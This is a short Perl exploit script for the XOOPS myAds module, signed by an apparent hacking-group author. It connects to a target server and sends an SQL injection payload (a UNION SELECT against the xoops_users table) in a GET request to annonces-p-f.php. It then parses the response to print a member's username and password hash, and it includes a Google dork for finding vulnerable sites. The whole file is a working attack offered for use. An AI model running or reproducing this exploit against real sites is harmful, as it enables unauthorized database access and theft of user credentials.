#!/usr/bin/perl
use IO::Socket;
######################################################
# xoops myAds module exploit for users hash viewing  #
# coded by Fear[Cyber Lords Community]               #
# http://www.cyberlords.net                          #
# Thx for help: not null                             #
# just for fun ;)                                    #
######################################################
$serv = $ARGV[0];
$path = $ARGV[1];
$userid = $ARGV[2];
$port=80;  
if (@ARGV<2) {
print "------------------------------------------------------------\n";
print "| Googledork: inurl:/modules/myAds/ \n";
print "| Usage:\n";
print "| cl_myads.pl <server> </folder/> <id> \n";
print "| <server>    - host for attacking \n";
print "| </folder/>  - module folder \n";
print "| <id>        - member id \n";
print "------------------------------------------------------------\n";
exit(0);
}
print "\n*************************\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$serv, PeerPort=>$port);
print "[+]Connecting...\r\n";
print $sock "GET $path/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,1,1,1,1,1,1,1,1,1+from+xoops_users+limit+$userid,1/* HTTP/1.0\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Connection: close\r\n\r\n";
print "[+]Data sent\r\n";
$s = "";
while ($answer = <$sock>) { 
$s .= $answer;
}
if($s =~m /<I>([0-9a-f]{32})<\/I>[^;]+;">([^<]+?)<\/DIV>/s)
{
print "[+]User: ".$2." Password-hash: ".$1."\r\n";
print "*************************\n";
} else { 
print "[-]Unvulnerable";
}
close($sock);